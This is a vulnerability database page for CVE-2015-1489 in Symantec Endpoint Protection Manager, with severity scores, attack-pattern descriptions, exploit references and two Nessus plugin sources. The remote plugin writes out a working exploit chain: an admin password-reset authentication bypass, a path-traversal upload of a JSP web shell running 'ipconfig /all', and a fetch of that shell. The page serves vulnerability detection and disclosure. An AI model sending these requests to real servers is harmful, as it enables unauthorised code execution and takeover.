Vulnerabilities > CVE-2015-1489 - Permissions, Privileges, and Access Controls vulnerability in Symantec Endpoint Protection Manager 12.1.0

047910
CVSS 8.5 - HIGH
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
SINGLE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
symantec
CWE-264
nessus
exploit available
metasploit

Summary

The management console in Symantec Endpoint Protection Manager (SEPM) 12.1 before 12.1-RU6-MP1 allows remote authenticated users to gain privileges via unspecified vectors.

Vulnerable Configurations

Part Description Count
Application
Symantec
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Blue Boxing
    This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
  • Restful Privilege Elevation
    Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
  • Target Programs with Elevated Privileges
    This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.

Exploit-Db

descriptionSymantec Endpoint Protection Manager Authentication Bypass and Code Execution. CVE-2015-1486,CVE-2015-1487,CVE-2015-1489. Remote exploit for win32 platform
fileexploits/windows_x86/remote/37812.rb
idEDB-ID:37812
last seen2016-02-04
modified2015-08-18
platformwindows_x86
port8443
published2015-08-18
reportermetasploit
sourcehttps://www.exploit-db.com/download/37812/
titleSymantec Endpoint Protection Manager Authentication Bypass and Code Execution
typeremote

Metasploit

descriptionThis module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution.
idMSF:EXPLOIT/WINDOWS/HTTP/SEPM_AUTH_BYPASS_RCE
last seen2020-06-02
modified2017-07-24
published2015-08-01
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sepm_auth_bypass_rce.rb
titleSymantec Endpoint Protection Manager Authentication Bypass and Code Execution

Nessus

  • NASL familyWindows
    NASL idSYMANTEC_ENDPOINT_PROT_MGR_SYM15-007.NASL
    descriptionThe version of Symantec Endpoint Protection Manager (SEPM) installed on the remote host is prior to 12.1 RU6 MP1. It is, therefore, affected by the following vulnerabilities : - A flaw exists in the password reset functionality that allows a remote attacker, using a crafted password reset action, to generate a new administrative session, thus bypassing authentication. (CVE-2015-1486) - A flaw exists related to filename validation in a console session that allows an authenticated, remote attacker to write arbitrary files. (CVE-2015-1487) - A flaw exists in an unspecified action handler that allows an authenticated, remote attacker to read arbitrary files. (CVE-2015-1488) - An unspecified flaw exists that allows an authenticated, remote attacker to manipulate SEPM services and gain elevated privileges. (CVE-2015-1489) - A flaw exists that allows traversing outside of a restricted path, due to a failure to properly sanitize user-supplied input. An authenticated, remote attacker, using a specially crafted installation package, can exploit this to access files outside of the restricted path. (CVE-2015-1490) - A SQL injection vulnerability exists due to a failure to properly sanitize user-supplied input before building SQL queries. An authenticated, remote attacker can exploit this to disclose or manipulate data in the back-end database. (CVE-2015-1491) - A flaw in how Symantec Endpoint Protection clients load dynamic-link libraries allows an authenticated attacker to replace legitimate client libraries with malicious ones, thus injecting executable code. (CVE-2015-1492) - A flaw exists in the /servlet/AgentServlet script due to improper sanitization of user-supplied input before using it in SQL queries. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries against the back-end database, resulting in the disclosure or manipulation of arbitrary data. - A flaw exists in the SecurityAlertNotifyTask class due to improper sanitization of user-supplied input. An authenticated, remote attacker can exploit this to execute arbitrary commands. - A flaw exists in Rtvscan.exe related to searching and loading dynamic-link library (DLL) files due to using an insecure search path which may include directories that are not trusted or under the user
    last seen2020-06-01
    modified2020-06-02
    plugin id85256
    published2015-08-06
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/85256
    titleSymantec Endpoint Protection Manager 11.x / 12.x < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(85256);
      script_version("1.14");
      script_cvs_date("Date: 2019/11/22");
    
      script_cve_id(
        "CVE-2015-1486",
        "CVE-2015-1487",
        "CVE-2015-1488",
        "CVE-2015-1489",
        "CVE-2015-1490",
        "CVE-2015-1491",
        "CVE-2015-1492"
      );
      script_bugtraq_id(
        76074,
        76077,
        76078,
        76079,
        76081,
        76083,
        76094
      );
      script_xref(name:"EDB-ID", value:"37812");
    
      script_name(english:"Symantec Endpoint Protection Manager 11.x / 12.x < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)");
      script_summary(english:"Checks the SEPM version.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The version of Symantec Endpoint Protection Manager installed on the
    remote host is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Symantec Endpoint Protection Manager (SEPM) installed
    on the remote host is prior to 12.1 RU6 MP1. It is, therefore,
    affected by the following vulnerabilities :
    
      - A flaw exists in the password reset functionality that
        allows a remote attacker, using a crafted password reset
        action, to generate a new administrative session, thus
        bypassing authentication. (CVE-2015-1486)
    
      - A flaw exists related to filename validation in a
        console session that allows an authenticated, remote
        attacker to write arbitrary files. (CVE-2015-1487)
    
      - A flaw exists in an unspecified action handler that
        allows an authenticated, remote attacker to read
        arbitrary files. (CVE-2015-1488)
    
      - An unspecified flaw exists that allows an authenticated,
        remote attacker to manipulate SEPM services and gain
        elevated privileges. (CVE-2015-1489)
    
      - A flaw exists that allows traversing outside of a
        restricted path, due to a failure to properly sanitize
        user-supplied input. An authenticated, remote attacker,
        using a specially crafted installation package, can
        exploit this to access files outside of the restricted
        path. (CVE-2015-1490)
    
      - A SQL injection vulnerability exists due to a failure to
        properly sanitize user-supplied input before building
        SQL queries. An authenticated, remote attacker can
        exploit this to disclose or manipulate data in the
        back-end database. (CVE-2015-1491)
    
      - A flaw in how Symantec Endpoint Protection clients load
        dynamic-link libraries allows an authenticated attacker
        to replace legitimate client libraries with malicious
        ones, thus injecting executable code. (CVE-2015-1492)
    
      - A flaw exists in the /servlet/AgentServlet script due to
        improper sanitization of user-supplied input before
        using it in SQL queries. An unauthenticated, remote
        attacker can exploit this to inject or manipulate SQL
        queries against the back-end database, resulting in the
        disclosure or manipulation of arbitrary data.
    
      - A flaw exists in the SecurityAlertNotifyTask class due
        to improper sanitization of user-supplied input. An
        authenticated, remote attacker can exploit this to
        execute arbitrary commands.
    
      - A flaw exists in Rtvscan.exe related to searching and
        loading dynamic-link library (DLL) files due to using
        an insecure search path which may include directories
        that are not trusted or under the user's control. An
        attacker can exploit this, by injecting a crafted DLL
        file into path, to execute arbitrary code with the
        privileges of the user.");
      # https://support.symantec.com/en_US/article.SYMSA1330.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?647383e8");
      # https://codewhitesec.blogspot.com/2016/02/symantec-endpoint-protection-legacy-edition.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?74c04e62");
      # https://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?135bc3c2");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Symantec Endpoint Protection Manager version 12.1 RU6 MP1
    or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-1492");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Symantec Endpoint Protection Manager File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/07/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/08/06");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:endpoint_protection_manager");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("symantec_endpoint_prot_mgr_installed.nasl");
      script_require_keys("installed_sw/Symantec Endpoint Protection Manager");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("install_func.inc");
    
    app = 'Symantec Endpoint Protection Manager';
    
    install = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);
    
    version = install['version'];
    path    = install['path'   ];
    
    fixed_ver = '12.1.6306.6100';
    
    if (version =~ "^(12\.1|11\.0)(\.|$)" && ver_compare(ver:version, fix:fixed_ver, strict:FALSE) == -1)
    {
      port = get_kb_item("SMB/transport");
      if (!port)
        port = 445;
    
      items = make_array("Path", path, "Installed version", version, "Fixed version", fixed_ver);
      order = make_list("Path", "Installed version", "Fixed version");
    
      report = report_items_str(report_items:items, ordered_fields:order);
      security_report_v4(port:port, extra:report, sqli:TRUE, severity:SECURITY_HOLE);
      exit(0);
    }
    else
      audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);
    
  • NASL familyCGI abuses
    NASL idSYMANTEC_ENDPOINT_PROT_MGR_SYM15-007_REMOTE.NASL
    descriptionThe version of Symantec Endpoint Protection Manager (SEPM) running on the remote host is prior to 12.1 RU6 MP1. It is, therefore, affected by the following vulnerabilities : - A flaw exists in the password reset functionality that allows a remote attacker, using a crafted password reset action, to generate a new administrative session, thus bypassing authentication. (CVE-2015-1486) - A flaw exists related to filename validation in a console session that allows an authenticated, remote attacker to write arbitrary files. (CVE-2015-1487) - An unspecified flaw exists that allows an authenticated, remote attacker to manipulate SEPM services and gain elevated privileges. (CVE-2015-1489) Nessus attempts to use the authentication bypass flaw in conjunction with the arbitrary file upload and path traversal flaws to test the issue on the remote server. If this test succeeds, it is likely that the application is also affected by other vulnerabilities, including a SQL Injection.
    last seen2020-06-01
    modified2020-06-02
    plugin id85351
    published2015-08-13
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/85351
    titleSymantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(85351);
      script_version("1.12");
      script_cvs_date("Date: 2019/11/22");
    
      script_cve_id("CVE-2015-1486", "CVE-2015-1487", "CVE-2015-1489");
      script_bugtraq_id(76074, 76078, 76094);
    
      script_name(english:"Symantec Endpoint Protection Manager < 12.1 RU6 MP1 Multiple Vulnerabilities (SYM15-007)");
      script_summary(english:"Attempts to exploit the issue.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An application running on the remote host is affected by multiple
    vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Symantec Endpoint Protection Manager (SEPM) running
    on the remote host is prior to 12.1 RU6 MP1. It is, therefore,
    affected by the following vulnerabilities :
    
      - A flaw exists in the password reset functionality that
        allows a remote attacker, using a crafted password reset
        action, to generate a new administrative session, thus
        bypassing authentication. (CVE-2015-1486)
    
      - A flaw exists related to filename validation in a
        console session that allows an authenticated, remote
        attacker to write arbitrary files. (CVE-2015-1487)
    
      - An unspecified flaw exists that allows an authenticated,
        remote attacker to manipulate SEPM services and gain
        elevated privileges. (CVE-2015-1489)
    
    Nessus attempts to use the authentication bypass flaw in conjunction
    with the arbitrary file upload and path traversal flaws to test the
    issue on the remote server. If this test succeeds, it is likely that
    the application is also affected by other vulnerabilities, including
    a SQL Injection.");
      # https://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?135bc3c2");
      # https://support.symantec.com/en_US/article.SYMSA1330.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?647383e8");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Symantec Endpoint Protection Manager 12.1 RU6 MP1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Symantec Endpoint Protection Manager File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/07/30");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/08/13");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:endpoint_protection_manager");
      script_end_attributes();
    
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("symantec_endpoint_prot_mgr_detect.nasl");
      script_require_keys("installed_sw/sep_mgr");
      script_require_ports("Services/www", 9090);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    app = 'Symantec Endpoint Protection Manager';
    get_install_count(app_name:"sep_mgr", exit_if_zero:TRUE); # Stops port branching
    
    port = get_http_port(default:9090);
    
    install = get_single_install(app_name:"sep_mgr", port:port);
    
    url = build_url(port:port, qs:install["dir"]);
    req = make_list();
    
    
    # The first request takes a bit longer than most requests
    http_set_read_timeout(30);
    # First we make the request to reset the password
    item ="/servlet/ConsoleServlet?ActionType=ResetPassword&UserID=admin&Domain=";
    res  = http_send_recv3(
      port         : port,
      method       : "POST",
      item         : item,
      exit_on_fail : TRUE
    );
    # Bail out for unexpected response
    if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
    req[0] = http_last_sent_request();
    
    time = unixtime();
    file = "nessus_"+SCRIPT_NAME - ".nasl" + '-' + time + '.jsp';
    dat  = '<%=new java.util.Scanner(Runtime.getRuntime().exec("ipconfig /all").getInputStream()).useDelimiter("\\\\A").next()%>';
    item = "/servlet/ConsoleServlet?ActionType=BinaryFile&KnownHosts=.&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/"+file;
    res  = http_send_recv3(
      port         : port,
      method       : "POST",
      item         : item,
      data         : dat,
      exit_on_fail : TRUE
    );
    # Bail out for unexpected response
    if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
    req[1] = http_last_sent_request();
    
    res = http_send_recv3(
      port         : port,
      method       : "GET",
      item         : "/"+file,
      exit_on_fail : TRUE
    );
    req[2] = http_last_sent_request();
    # Bail out for unexpected response
    if("200 OK" >!< res[0] || "Server: SEPM" >!< res[1])
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
    output = chomp(res[0]+res[1]+res[2]);
    
    # Final check to make sure we were able to exploit
    if("200 OK" >!< output ||  "Subnet Mask" >!< output)
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
    
    security_report_v4(
      port         : port,
      request      : req,
      output       : output,
      severity     : SECURITY_HOLE,
      rep_extra    : "Note: This file has not been removed by Nessus and will need to be manually deleted ("+file+")",
      cmd          : "ipconfig /all"
    );
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/133112/sepm_auth_bypass_rce.rb.txt
idPACKETSTORM:133112
last seen2016-12-05
published2015-08-17
reporterBrandon Perry
sourcehttps://packetstormsecurity.com/files/133112/Symantec-Endpoint-Protection-Manager-Authentication-Bypass-Code-Execution.html
titleSymantec Endpoint Protection Manager Authentication Bypass / Code Execution